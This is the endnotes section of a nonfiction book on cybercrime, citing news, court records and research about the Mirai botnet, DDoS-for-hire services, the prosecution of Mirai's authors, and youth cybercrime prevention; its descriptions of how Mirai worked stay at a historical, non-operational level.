primitive botnet: MafiaBoy gained illegal access to seventy-five computers in fifty-two different networks; forty-eight of the fifty-two networks were at universities: James Evan, “Mafiaboy’s Story Points to Net Weaknesses,” IT World Canada, January 26, 2001, www.itworldcanada.com/article/mafiaboys-story-points-to-net-weaknesses/29212.
national security threat: Special White House Briefing, “Meeting with Internet Security Groups,” CSPAN, February 15, 2000, https://www.c-span.org/video/?155435-1/internet-security.
Denial of Service attacks: FBI National Press Office, “Mafiaboy Pleads Guilty,” FBI, January 19, 2001, archives.fbi.gov/archives/news/pressrel/press-releases/mafiaboy-pleads-guilty.
five months in juvenile detention: Rebecca Hersher, “Meet Mafiaboy, the ‘Bratty Kid’ Who Took Down the Internet,” NPR, February 7, 2015, choice.npr.org/index.html?origin=https://www.npr.org/sections/alltechconsidered/2015/02/07/384567322/meet-mafiaboy-the-bratty-kid-who-took-down-the-internet.
did it for the money: Krebs, “Israeli Online Attack Service.”
DDoS as a service: See Ryan Francis, “Hire a DDoS Service to Take Down Your Enemies,” CSO Online, March 15, 2017, www.csoonline.com/article/3180246/hire-a-ddos-service-to-take-down-your-enemies.html; Mohammad Karami and Damon McCoy, “Understanding the Emerging Threat of DDoS-as-a-Service” (paper presented at USENIX Workshop on Large-Scale Exploits and Emergent Threats, LEET 13, Washington, DC, August 12, 2013), www.usenix.org/system/files/conference/leet13/leet13-paper_karami.pdf; Mohammad Karami and Damon McCoy, “Rent to Pwn: Analyzing Commodity Booter DDoS Services,” login: TheUSENIX Magazine 38, no. 6 (December 2013): 20–23, https://www.usenix.org/system/files/login/articles/05_karami-online.pdf.
stressor services: Booter comes from the malicious act of “booting” a game’s player out of an online game, but stressor has a benign meaning in that it refers to stress tests performed against one’s own servers to assess their resilience: Alice Hutchings and Richard Clayton, “Exploring the Provision of Online Booter Services,” Deviant Behavior 37, no. 10 (May 2016): 1163–78, https://www.repository.cam.ac.uk/bitstream/handle/1810/252340/Hutchings%20%26%20Clayton%202015%20Deviant%20Behavior.pdf?sequence=1&isAllowed=y.
in one year: Brian Krebs, “Following the Money Hobbled VDoS Attack-for-Hire Service,” Krebs on Security, June 6, 2017, krebsonsecurity.com/2017/06/following-the-money-hobbled-vdos-attack-for-hire-service.
“off-line in a heartbeat”: Krebs, “Israeli Online Attack Service.”
largest DDoS mitigation companies in the world: Ryan Brunt, Prakhar Pandey, and Damon McCoy, “Booted: An Analysis of a Payment Intervention on a DDoS-for-Hire Service” (presented at the Workshop on the Economics of Information Security, California, June 2017), 5, http://damonmccoy.com/papers/vdos.pdf.
no technical knowledge required: In 2010, researchers discovered that twelve out of the top twenty malware in the world were sold using a pay-per-install model, in which cybercriminals pay for the number of devices they want infected: Juan Caballero et al., “Measuring Pay-per-Install: The Commoditization of Malware Distribution,” Proceedings of the 20th USENIX Security Symposium, August 8, 2011, www.usenix.org/legacy/events/sec11/tech/full_papers/Caballero.pdf.
fourteen gigabits/second: Krebs, “Israeli Online Attack Service.”
Hack Forums once did: Brian Krebs, “Hackforums Shutters Booter Service Bazaar,” Krebs on Security, October 31, 2016, https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/.
known as nodes: See generally “About Tor Browser,” https://tb-manual.torproject.org/about.
to communicate confidentially: Ty McCormick, “The Darknet: A Short History,” Foreign Policy, December 9, 2013, https://foreignpolicy.com/2013/12/09/the-darknet-a-short-history/.
“any impairment to the”: 18 U.S.C. §1030(a)(5)(A) and (e)(8).
stress test websites: Krebs, “Hackforums Shutters Booter Service.”
all responsibility for any such attacks: Justyna Chromik et al., “Booter Website Characterization: Toward a List of Threats” (presented at the XXXIII Simpósio Brasileiro de Redes de Computadores e Sistemas Distribuídos, January 2015), 5, https://annasperotto.org/publication/papers/2015/chromik-sbrc-2015.pdf.
not stressing their own websites: Krebs, “Israeli Online Attack Service.”
“We do try to market”: Alice Hutchings and Richard Clayton, “Exploring the Provision of Online Booter Services,” Deviant Behavior 37, no. 10 (2016): 1172.
give up on Incapsula: Mike Waterhouse, “Rutgers University’s Computer Network Under Attack; Website, Internet Access Down on Campus,” ABC7NY, September 28, 2015, https://abc7ny.com/rutgers-university-computer-network-attack/1006255/.
cybersecurity was not working: Hallel Yadin, “Rutgers Students Want Refunds After Fifth DDoS Attack in One Year,” New Brunswick Today, October 11, 2015, https://newbrunswicktoday.com/2015/10/11/rutgers-students-want-refunds-after-fifth-ddos-attack-in-one-year/.
May 2016: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS and the Criminal Ecosystem,” YouTube, April 9, 2020, at 17:31, www.youtube.com/watch?v=NQPJeDNdG6w.
“lightspeed” and “thegenius”: United States Department of Justice, December 5, 2017, https://www.justice.gov/opa/press-release/file/1017596/download.
half a million computers: Brian Krebs confirmed that Josiah had contributed to Qbot: Krebs, “Who Is Anna-Senpai?” Information on Qbot can be found at Phil Muncaster, “Massive Qbot Botnet Strikes 500,000 Machines Through WordPress,” Infosecurity Magazine, October 8, 2014, https://www.infosecurity-magazine.com/news/massive-qbot-strikes-500000-pcs/. On Qbot, see Pascal Geenens, “IoT Botnets: The Journey So Far and the Road Ahead,” in Kambourakis et al., Botnets, 52–61.
Bashlite, Gafgyt, Lizkebab, and Torlus: Krebs, “Who Is Anna-Senpai?”
doing DDoS mitigation: Krebs, “Who Is Anna-Senpai?”
Josiah agreed: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 17:46.
$15,000 a month: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 19:54.
Poodle Corp: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 17:07.
specialized in finding vulnerabilities: United States v. Paras Jha et al., Government’s Sentencing Memo, Case No. 3:17-cr-00165-TMB, filed September 11, 2018, 19.
controlling the botnet: Qbot was written in C, but the C2 code was written in Go, a programming language developed by Google that handles concurrency processing well. The unusual choice of Go was key evidence when Brian Krebs linked Anna_Senpai to Paras. See Krebs, “Who Is Anna-Senpai?” Paras was in charge of building the C2. See United States v. Paras Jha et al., Plea Agreement (as to Paras Jha), 3:17-cr-00165-TMB, filed December 5, 2017, 6.
1,300 web-connected cameras: Tom Spring, “LizardStresser IoT Botnet Part of 400Gbps DDoS Attacks,” Threatpost, June 30, 2016, https://threatpost.com/lizard-stresser-iot-botnet-part-of-400gbps-ddos-attacks/119006/.
companies that hosted them: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 25:40.
Poodle Corp’s surprise: On takedown procedures, see Alice Hutchings et al., “Taking Down Websites to Prevent Crime,” 2016 APWG Symposium on Electronic Crime Research (eCrime), 2016, 1–10.
about the future: Government’s Sentencing Memo, 15–16. Paras explained his choice of Mirai Nikki, claiming that the series “literally defines the genre … on psychological thrillers” (16).
the series Shimoneta: Krebs, “Who Is Anna-Senpai?”
“Just made this post”: Anna-Senpai, “Killing All Telnets,” Hack Forums, July 10, 2016, https://hackforums.net/showthread.php?tid=5334225.
OG_Richard_Stallman: Krebs, “Who Is Anna-Senpai?”
DDoS victims: Krebs, “Who Is Anna-Senpai?”
Disinformation was in the air: The hacks of the DNC were discussed extensively on hackforums.net: https://hackforums.net/search.php?action=results&sid=c01228abaf99c946f09e08f6cb4074da&sortby=lastpost&order=asc.
every seventy-six minutes: Manos Antonakakis et al., “Understanding the Mirai Botnet,” Proceedings of the 26th USENIX Security Symposium, British Columbia, Canada, August 16–18, 2017, 19, https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-antonakakis.pdf.
The result: forty-one minutes: Andrew McGill, “The Inevitability of Being Hacked,” Atlantic, October 28, 2016, www.theatlantic.com/technology/archive/2016/10/we-built-a-fake-web-toaster-and-it-was-hacked-in-an-hour/505571. While McGill doesn’t specify that the botnet that infected his pretend toaster was Mirai, his exercise was a response to a Mirai DDoS attack, and it’s likely that Mirai did indeed infect it.
GameOver ZeuS: See generally Josephine Wolff, You’ll See This Message When It’s Too Late: The Legal and Economic Aftermath of Cybersecurity Breaches (Cambridge, MA: MIT Press, 2018), 59–78.
a million Windows machines worldwide: Brian Krebs, “‘Operation Tovar’ Targets ‘Gameover’ ZeuS Botnet, CryptoLocker Scourge,” Krebs on Security, June 2, 2014, https://krebsonsecurity.com/2014/06/operation-tovar-targets-gameover-zeus-botnet-cryptolocker-scourge/.
only forty-five agents: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 04:45.
“Alaska’s uniquely positioned”: Graff, “How a Dorm Room.”
all their botnets: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 35:30.
VDoS founders in Israel: Krebs, “Alleged vDOS Proprietors.”
they went dark as well: Brian Krebs, “Are the Days of ‘Booter’ Services Numbered?,” Krebs on Security, October 27, 2016, krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered.
Midwestern accent: Zack Sharf, “Douglas Rain, Voice of HAL 9000 in ‘2001: A Space Odyssey,’ Dies at 90—Here’s Why Stanley Kubrick Cast Him,” IndieWire, November 12, 2018, https://www.indiewire.com/2018/11/douglas-rain-dead-hal-9000-2001-a-space-odyssey-stanley-kubrick-cast-1202019828/.
Heuristically Algorithmic Language-Processor: Aisha Harris, “Is HAL Really IBM?,” Slate, January 7, 2013, slate.com/culture/2013/01/hal-9000-ibm-theory-stanley-kubrick-letters-shed-new-light-on-old-debate.html.
understood their potential: The security community warned about the problem. Kim Zetter, “The Biggest Security Threats We’ll Face in 2016,” Wired, January 1, 2016, https://www.wired.com/2016/01/the-biggest-security-threats-well-face-in-2016/. See also Bruce Schneier, Click Here to Kill Everybody: Security and Survival in a Hyper-connected World (New York: Norton, 2018).
operational on August 1: The antimalware organization Malware Must Die posted a blog entry about a new scanning botnet of which they had samples as soon as August 4. It also noted the IP address of the scanner. “MMD-0056–2016-Linux/Mirai, How an Old ELF Malcode Is Recycled,” Malware Must Die, September 1, 2016, https://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html. That IP address belonged to a New York hosting company used by Josiah White: Government’s Sentencing Memorandum, 19–20.
knock it off-line: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS and the Criminal Ecosystem,” YouTube, April 9, 2020, at 27:07, www.youtube.com/watch?v=NQPJeDNdG6w; Robert Webb, “Host.us DDOS Attack,” NANOG Email Archive, August 3, 2016, https://www.mail-archive.com/nanog@nanog.org/msg86857.html.
NSA tools leak: Lightning Bow, “Government Investigating Routernets?,” Hack Forums, August 5, 2016, https://hackforums.net/showthread.php?tid=5364849. Lightning Bow is a video game reference—it’s a weapon in Call of Duty: Black Ops III.
mislead law enforcement: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 27:31.
the abusive server: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 28:28.
disinfect the botnet themselves: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 32:50.
took its website off-line: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 30:24.
When Mirai infects: Mirai source code at https://github.com/jgamblin/Mirai-Source-Code.
when its host is rebooted: Antonakakis et al., “Understanding the Mirai Botnet,” Proceedings of the 26th USENIX Security Symposium, British Columbia, Canada, August 16–18, 2017, 1094, https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-antonakakis.pdf.
Detected files are deleted: Antonakakis et al., “Understanding the Mirai Botnet.”
scanning or attacking: Or both. Mirai used concurrent processes to scan and attack.
trying to connect to them: The scanner blocklists forty-three IP ranges, such as those allocated to the General Electric Corporation, the U.S. Post Office, and the Pentagon. Some entries on the list make little sense (the General Electric Corporation?), which suggests that Josiah copied the blocklist from some older malware. The scanner discards blocklisted IP addresses.
IoT devices do not: Zhen Ling et al., “New Variants of Mirai and Analysis,” in Encyclopedia of Wireless Networks, ed. Xuemin (Sherman) Shen, Xiaodong Lin, and Kuan Zhang (Cham, Switzerland: Springer, 2020), https://www.cs.ucf.edu/~czou/research/Mirai-Springer-2020.pdf.
records the address: The scanner sends out 160 SYN packets to these addresses. If the destination’s port 23 is open and Telnet enabled, it will respond with an ACK packet—short for “Acknowledged” or “Yes, I can hear you. Please proceed.” Receiving a favorable reply, the scanner puts the IP address in its target table.
switches to attack mode: Attack.c at https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/attack.c.
brute force dictionary attack: Ben Herzberg, Igal Zeifman, and Dima Bekerman, “Breaking Down Mirai: An IoT DDoS Botnet Analysis,” Imperva (blog), https://www.imperva.com/blog/malware-analysis-mirai-ddos-botnet/?redirect=Incapsula.
The last entry in the dictionary: Dictionary at line 122–85 of scanner.c, https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/scanner.c.
changed the credentials: A. L. Johnson, “Thousands of Ubiquiti AirOS Routers Hit with Worm Attacks,” Broadcom Endpoint Protection: Library, May 19, 2016, https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=426cee5f-7aa7-4be7-a569-4718ee573660&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=library-documents.
scanning for new conscripts: While Mirai behaved a lot like self-replicating malware, experiencing exponential growth, it was neither a worm nor a virus. The version of Mirai that ran on an IoT device did the scanning, but not the loading. It did not try to copy itself and infect another device with its progeny. A centralized loading server was responsible for distributing copies of Mirai to engage in further scanning and attacking. In his dissertation, Vesselin Bontchev called malware using a centralized loader an “octopus.” The terminology did not catch on.
On September 20: “DDoS Mitigation Firm Has History of Hijacks,” Krebs on Security, September 20, 2016, https://krebsonsecurity.com/2016/09/ddos-mitigation-firm-has-history-of-hijacks/.
full force of his arsenal: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 37:08.
“That was worrisome”: Peterson’s quote comes from Garrett Graff, “How a Dorm Room Minecraft Scam Brought Down the Internet,” Wired, December 13, 2017. According to a team from UC Berkeley, the total cost of added bandwidth and energy consumption from the Mirai attack on Krebs on Security came to $323,973.95: “Project RioT,” UC Berkeley School of Information, 2018, groups.ischool.berkeley.edu/riot.
“Mirai was the first botnet”: Graff, “How a Dorm Room.”
news organizations from DDoS attacks: Andy Greenberg, “Google Wants to Save News Sites from Cyberattacks—for Free,” Wired, February 24, 2016, www.wired.com/2016/02/google-wants-save-news-sites-cyberattacks-free.
the attacks resumed: Brian Krebs, “How Google Took on Mirai, KrebsOnSecurity,” Krebs on Security, February 3, 2017, krebsonsecurity.com/2017/02/how-google-took-on-mirai-krebsonsecurity/#more-37945.
“greatest hits” of DDoS techniques: Dan Goodin, “How Google Fought Back Against a Crippling IoT-Powered Botnet and Won,” Ars Technica, February 2, 2017, arstechnica.com/information-technology/2017/02/how-google-fought-back-against-a-crippling-iot-powered-botnet-and-won.
175,000 IP addresses: Goodin, “How Google Fought Back.”
Google thwarted the attack: Goodin, “How Google Fought Back.”
Paras had a big bag of tricks: Mirai, for example, used syn-cookie mitigation as an attack type. See Vladimir Unterfingher, “Technical Analysis of the Mirai Botnet Phenomenon,” Heimdal Security, last updated April 16, 2021, https://heimdalsecurity.com/blog/mirai-botnet-phenomenon/.
“LARGEST DDOS EVER”: According to Cloudflare, the largest DDoS in history was the attack on GitHub, a popular online code repository, in February 2018. At its peak, incoming traffic achieved a rate of 1.3 terabytes per second, sending packets at a rate of 126.9 million per second. See “Famous DDoS Attacks,” Cloudflare Learning Center, Cloudflare, accessed February 25, 2022, https://www.cloudflare.com/learning/ddos/famous-ddos-attacks/.
overwhelm a normal ISP router: Claims about DDoS attack size also have a “units” problem. Do we measure attacks based on bits/second, bytes/second, packets/second, or requests/second?
valuable resource is WHOIS: WHOIS has become less valuable as a result of the European Union’s General Data Protection Regulation. The GDPR has required the removal from the database of information such as the name of the person who registered the domain, as well as their phone number, physical address, and email address. Matthew Kahn, “WHOIS Going to Keep the Internet Safe?” Lawfare, Wednesday, May 2, https://www.lawfareblog.com/whois-going-keep-internet-safe; Brian Krebs, “Who Is Afraid of More Spams and Scams?,” Krebs on Security, https://krebsonsecurity.com/2018/03/who-is-afraid-of-more-spams-and-scams/#more-42946.
a d-order: 18 U.S.C. §2703(d).
applying for search warrants: In addition to showing probable cause, prosecutors must show that ordinary investigative techniques have failed and that agents will not collect conversations unrelated to the investigation. Judges usually review the progress of the investigation with prosecutors every week to see if a warrant is still necessary. After thirty days, the warrant expires.
subpoenas are confidential: Witnesses and prosecutors can waive the confidentiality requirement.
devices in Alaska: Purdue CERIAS, “2020-04-08 CERIAS-Mirai-DDoS,” at 39:30.
they served subpoenas on: Graff, “How a Dorm Room.”
physical space: A point made fifteen years ago by Jack Goldsmith and Tim Wu, Who Controls the Internet: Illusions of a Borderless World (New York: Oxford University Press, 2008).
“I’ve run against”: Graff, “How a Dorm Room.”
raided the boy’s house: Graff, “How a Dorm Room.”
350 gigabits/second: Brian Krebs, “Who Is Anna-Senpai, the Mirai Worm Author?,” Krebs on Security, January 18, 2017, krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author.
“is a teenage male”: Brian Krebs, “‘Operation Tarpit’ Targets Customers of Online Attack-for-Hire Services,” Krebs on Security, December 13, 2016, https://krebsonsecurity.com/2016/12/operation-tarpit-targets-customers-of-online-attack-for-hire-services/.
The attack lasted three days: Luckykessie, “Network Issues 27th–30th September 2016,” Hypixel-Minecraft Server and Maps, October 10, 2016, hypixel.net/threads/network-issues-27th-30th-september-2016.876087. See also Krebs, “Who Is Anna-Senpai?”
a digital black hole: Krebs, “Who Is Anna-Senpai?”
The discussion between the two men: The entire transcript of their chat can be found at https://krebsonsecurity.com/wp-content/uploads/2017/01/annasenpaichat.txt.
“So today”: Anna_Senpai, “World’s Largest Net: Mirai Botnet, Client, Echo Loader, CNC Source Code Release,” Hack Forums, September 30, 2016, hackforums.net/showthread.php?tid=5420472.
vulnerability is announced: Tim Willis, “Policy and Disclosure: 2021 Edition,” Google Project Zero (blog), June 14, 2021, googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.
the complete version: Purdue CERIAS, “2020-04-08 CERIAS-Mirai-DDoS,” at 38:40.
aggressively killed other malware: Twenty-four unique binaries were uploaded to VirusTotal: Antonakakis et al., “Understanding the Mirai Botnet,” 1102.
a fabricated story: Krebs, “Who Is Anna-Senpai?”
It began: Antonakakis et al., “Understanding the Mirai Botnet,” 1105–6; Samit Sarkar, “Massive DDoS Attack Affecting PSN, Some Xbox Live Apps (Update),” Polygon, October 21, 2016, https://www.polygon.com/2016/10/21/13361014/psn-xbox-live-down-ddos-attack-dyn.
point of the attack: https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-antonakakis.pdf.
a teenage boy: Shortly after the Dyn attack, Hack Forums removed their Booting Services board: Brian Krebs, “Hackforums Shutters Booter Service Bazaar,” Krebs on Security, October 31, 2016, https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/.
TalkTalk: Mark Tighe, “Larne Hacker Aaron Sterritt, aka ‘Vamp,’ Faces Fresh Charges in US,” The Times, July 5, 2020, https://www.thetimes.co.uk/article/larne-hacker-aaron-sterritt-aka-vamp-faces-fresh-charges-in-us-7089csqsw.
“UK national resident”: National Crime Agency, NCA Northern Ireland Performance Q1 2018/19 (April–June 2018), August 22, 2018, https://www.nipolicingboard.org.uk/sites/nipb/files/publications/ni-performance-report-apr-june-2018.pdf.
for the attacks: Brian Krebs, “New Charges, Sentencing in Satori IoT Botnet Conspiracy,” Krebs on Security, June 26, 2020, krebsonsecurity.com/2020/06/new-charges-sentencing-in-satori-iot-botnet-conspiracy.
significant advertising revenue: One hundred thousand figure from United States v. Paras Jha, Clickfraud Plea Agreement, 5, https://www.justice.gov/opa/press-release/file/1017541/download.
ever made with DDoS: Purdue CERIAS, “2020-04-08 CERIAS-Mirai-DDoS,” at 43:59.
$14,000 from DDoS-ing: United States of America v. Paras Jha, Plea Agreement, December 5, 2017, 5, https://www.justice.gov/opa/press-release/file/1017541/download (“As a result of this scheme, Jha and his co-conspirators received as proceeds approximately one hundred bitcoin, valued on January 29, 2017, at over $180,000”); United States v. Paras Jha and Dalton Norman, Government’s Sentencing Memo, filed September 11, 2018, 29.
$16 billion per annum: Brian Krebs, “Mirai IoT Botnet Co-Authors Plead Guilty,” Krebs on Security, December 13, 2017, https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/.
nine hundred thousand routers: “Deutsche Telekom Hack Part of Global Internet Attack,” Deutsche Welle, November 29, 2016, https://www.dw.com/en/deutsche-telekom-hack-part-of-global-internet-attack/a-36574934.
Liberia’s entire internet: Elie Bursztein, “Inside the Infamous Mirai IoT Botnet: A Retrospective Analysis,” Cloudflare Blog, December 14, 2017, blog.cloudflare.com/inside-mirai-the-infamous-iot-botnet-a-retrospective-analysis; Catalin Cimpanu, “Hacker ‘BestBuy’ Admits to Hijacking Deutsche Telekom Routers with Mirai Malware,” Bleeping Computer, July 22, 2017, https://www.bleepingcomputer.com/news/security/hacker-bestbuy-admits-to-hijacking-deutsche-telekom-routers-with-mirai-malware/.
a bunch of teenagers: Brian Krebs, “New Charges, Sentencing in Satori,” Krebs on Security, June 25, 2020, https://krebsonsecurity.com/2020/06/new-charges-sentencing-in-satori-iot-botnet-conspiracy/.
“They dumped the source code”: Brian Krebs (BrianKrebs), “Expert: IoT Botnets the Work of a ‘Vast Minority,’” VoIP-Info Forum, January 24, 2018, www.voip-info.org/forum/threads/expert-iot-botnets-the-work-of-a-‘vast-minority’.22335.
evidence was irrefutable: Purdue CERIAS, “2020-04-08 CERIAS-Mirai-DDoS,” at 39:45.
just five years: See: Krebs, “Mirai IoT Botnet”; Kelly Heyboer and Ted Sherman, “Former Rutgers Student Admits to Creating Code That Crashed Internet,” NJ, December 13, 2017, https://www.nj.com/education/2017/12/rutgers_student_charged_in_series_of_cyber_attacks.html#incart_river_mobile_home.
“I really don’t think”: United States v. Paras Jha, Partial Transcript of Imposition of Sentence, September 18, 2018, 10.
“I didn’t think of them”: Partial Transcript of Imposition, 14.
“the divide between”: Graff, “How a Dorm Room.”
“cybersecurity matters”: Graff, “How a Dorm Room.”
escaped jail time: Graff, “How a Dorm Room.”
“‘You’re in a hole’”: Partial Transcript of Imposition, 15. The transcript says “start digging,” which I assume is a mistranscription.
“my family, my friends”: Partial Transcript of Imposition, 16.
yes or no: Partial Transcript of Imposition, 18.
“I want to thank the FBI”: Partial Transcript of Imposition, 19.
“picked a better role model”: Partial Transcript of Imposition, 21.
Evgeny Morozov: Evgeny Morozov, To Save Everything, Click Here: The Folly of Technological Solutionism (Washington, DC: PublicAffairs, 2013).
“Africa? There’s an App”: “Africa? There’s an App for That,” Wired, August 7, 2012, https://web.archive.org/web/20120807145838/https://www.wired.co.uk/news/archive/2012-08/07/africa-app-store-apple.
Solutionism is ubiquitous in cybersecurity: Solutionism is pervasive in academic research as well, in large part because cybersecurity is usually studied and taught in computer-science departments. But not all research in this area is solutionist. See, e.g., Josephine Wolff, You’ll See This Message When It Is Too Late: The Legal and Economic Aftermath of Cybersecurity Breaches (Cambridge, MA: MIT Press, 2018). Recent anthropological work on hackers focuses on social upcode, the norms and rules of the hacker/cybersecurity community. See, e.g., Gabriella Coleman, Hacker, Hoaxer, Whistleblower, Spy: The Many Faces of Anonymous (London: Verso, 2014). Economic analysis: See, e.g., Ross Anderson, “Why Information Security Is Hard—An Economic Perspective,” Proceedings 17th Annual Computer Security Applications Conference, 2001, https://www.acsac.org/2001/papers/110.pdf. Sociology: Jonathan Lusthaus, The Industry of Anonymity (Cambridge, MA: Harvard University Press, 2018), 10–17. Law: See, e.g., Daniel J. Solove and Woodrow Hartzog, Breached!: Why Data Security Law Fails and How to Improve It (Oxford: Oxford University Press, 2022). It should be noted that there is an entire academic field known as “Science, Technology and Society Studies,” or STS, that studies how technology is affected by, and affects, social upcode.
Poverty and Famines: Amartya Sen, Poverty and Famines: An Essay on Entitlement and Deprivation (Oxford: Oxford University Press, 1981).
no famine: Sen, Poverty and Famines, 55.
inflationary shortfall: Sen, Poverty and Famines, 148.
not enough ways: Sen, Poverty and Famines, 93–94.
Security of Connected Devices: CA Civ Code §1798.91.04 (2018).
better security decisions: “SEC Proposes Rules on Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure by Public Companies,” press release, SEC, March 9, 2022, https://www.sec.gov/news/press-release/2022-39.
to be illusory: M. Tcherni et al., “The Dark Figure of Online Property Crime: Is Cyberspace Hiding a Crime Wave?,” Justice Quarterly 33, no. 5 (2016): 890–911; Ross Anderson et al., “Measuring the Changing Cost of Cybercrime,” 18th Annual Workshop on the Economics of Information Security, 2019.
Under international law: States often sign mutual legal assistance treaties that obligate them to assist each other in criminal prosecutions. See also the Council of Europe Convention on Cybercrime (Budapest Convention), which was designed to increase cooperation but has yet to make a significant impact. Christopher D’Urso, Nowhere to Hide: Investigating the Use of Unilateral Alternatives to Extradition in U.S. Prosecutions of Transnational Cybercrime (DPhil diss., Oxford University, 2021).
corporate-earnings information: Henry Meyer, Irina Reznik, and Hugo Miller, “U.S. Catches Kremlin Insider Who May Have Secrets of 2016 Hack,” Reuters, January 3, 2022, https://www.bloomberg.com/news/articles/2022-01-03/kremlin-insider-klyushin-is-said-to-have-2016-hack-details. See also Department of Justice, U.S. Attorney’s Office, District of Massachusetts, “Russian National Extradited for Role in Hacking and Illegal Trading Scheme,” December 20, 2021.
banking apps: Once it has infected a computer, usually through an email attachment, Emotet rifles through inboxes. It replies to old email threads, sending the correspondents messages with malicious links or Word documents laced with copies of Emotet. If the recipient clicks the link or opens the document and enables macros, the recipient’s computer becomes infected.
Under the auspices of EMPACT: “World’s Most Dangerous Malware EMOTET Disrupted Through Global Action,” press release, Europol, January 27, 2021, https://www.europol.europa.eu/media-press/newsroom/news/world’s-most-dangerous-malware-emotet-disrupted-through-global-action.
“can’t arrest our way out”: Jonathan Lusthaus, “The Criminal Silicon Valley Is Thriving,” The New York Times, November 29, 2019.
perpetrated with computers: Some traditional crimes have migrated online and have been transformed. See, e.g., Danielle Keats Citron, Hate Crimes in Cyberspace (Cambridge, MA: Harvard University Press, 2014).
steals credit card numbers: See generally Kevin Poulsen, Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground (New York: Crown, 2011).
drawn in this book: Hutchings notes a difference between cyber-enabled and cyber-dependent criminals. For example, cyber-enabled criminals begin offending because they feel unable to achieve “success” as society defines it (what criminologist Robert Merton called structural strain) and are presented an opportunity to change their social circumstances through illegal behavior: Alice Hutchings, “Cybercrime Trajectories: An Integrated Theory of Initiation, Maintenance and Desistance,” in Crime Online: Correlates, Causes, and Context, ed. Thomas J. Holt (Durham, NC: Carolina Academic Press, 2016), 117–40.
not worried about getting caught: Hutchings, “Cybercrime Trajectories.”
“Um, it is hard”: Hutchings, “Cybercrime Trajectories.”
ability to investigate: Hutchings, “Cybercrime Trajectories.”
entering adult life: Hutchings, “Cybercrime Trajectories.”
“Um, no real reason”: Alice Hutchings, “Theory and Crime: Does It Compute?” (PhD diss., Griffith University, 2013), https://research-repository.griffith.edu.au/bitstream/handle/10072/365227/Hutchings_2013_02Thesis.pdf?sequence=1.
employment status: Russell Brewer et al., Cybercrime Prevention (Cham, Switzerland: Palgrave Pivot, 2016), 5.
cyber-enabled offending: Hutchings, “Cybercrime Trajectories.”
hostile to women: Aja Romano, “What We Still Haven’t Learned from Gamergate,” Vox, January 7, 2021, https://www.vox.com/culture/2020/1/20/20808875/gamergate-lessons-cultural-impact-changes-harassment-laws.
to be undeserving: Hutchings, “Cybercrime Trajectories.”
deny responsibility: Hutchings, “Theory and Crime.”
“What started off as”: United States v. Paras Jha and Dalton Norman, Government’s Sentencing Memo, 14.
get a lot out of hacking: In an early small study of hackers who break software protection for illegal pirating, the twenty-four respondents reported that financial rewards were not motivating: Sigi Goode and Sam Cruise, “What Motivates Software Crackers?,” Journal of Business Ethics 65, no. 2 (2006): 121.
“online relationships”: The National Cyber Crime Unit (NCCU) also found that the primary motivation for hacking is completing a challenge and the sense of intellectual accomplishment that it brings. “Pathways into Cyber Crime,” National Crime Agency, January 13, 2017, 5, https://www.nationalcrimeagency.gov.uk/who-we-are/publications/6-pathways-into-cyber-crime-1/file. Equally important is the sense of belonging to community and proving prowess to one’s peers. The desire for street cred pushed hackers to develop their skills and escalate their exploits. Financial motivations were decidedly secondary.
choose not to engage: Hutchings, “Cybercrime Trajectories”; Brewer et al., Cybercrime Preventions, 41–42.
high-threat letters: Brewer et al., Cybercrime Preventions, 41–42.
“Greetings friend”: Hattie Jones, David Maimon, and Wuling Ren, “Sanction Threat and Friendly Persuasion Effects on System Trespassers’ Behaviors During a System Trespassing Event,” Cybercrime Through an Interdisciplinary Lens, ed. Thomas J. Holt (London: Routledge, 2016).
subsequent bad actions: Jones, Maimon, and Ren, “Sanction Threat.”
“Where offenders see”: Brewer et al., Cybercrime Preventions, 119.
visit from the police: Under the U.K. NCCU Prevent Program, when a young person is suspected of engaging in cybercriminality, police officers make a “cease-and-desist” visit to the young person’s home. “Pathways into Cyber Crime,” 5–6. They alert the up-and-coming hacker that the person’s actions are visible to law enforcement. They also describe the legal consequences of getting caught.
purpose is promising: Brewer et al., Cybercrime Preventions, 96. L0pht, the hacking group of which Mudge was a member, founded the security company @Stake in 2000. @Stake was bought by Symantec in 2004. See Joseph Menn et al., “FBI Probes Hacking of Democratic Congressional Group,” Reuters, July 29, 2016. For the transition from hacker to security professional, see Matt Goerzen and Gabriella Coleman, “Wearing Many Hats: The Rise of the Professional Security Hacker,” Data & Society, January 2022. See also Nicolas Auray and Danielle Kaminsky, “The Professionalisation Paths of Hackers in IT Security: The Sociology of a Divided Identity,” Annales des Télécommunications 62 (2007): 1312–26.
hacking competitions: Catherine Stupp, “European Police Aim to Keep Young Hackers from Slipping into Cybercrime,” The Wall Street Journal, July 14, 2022.
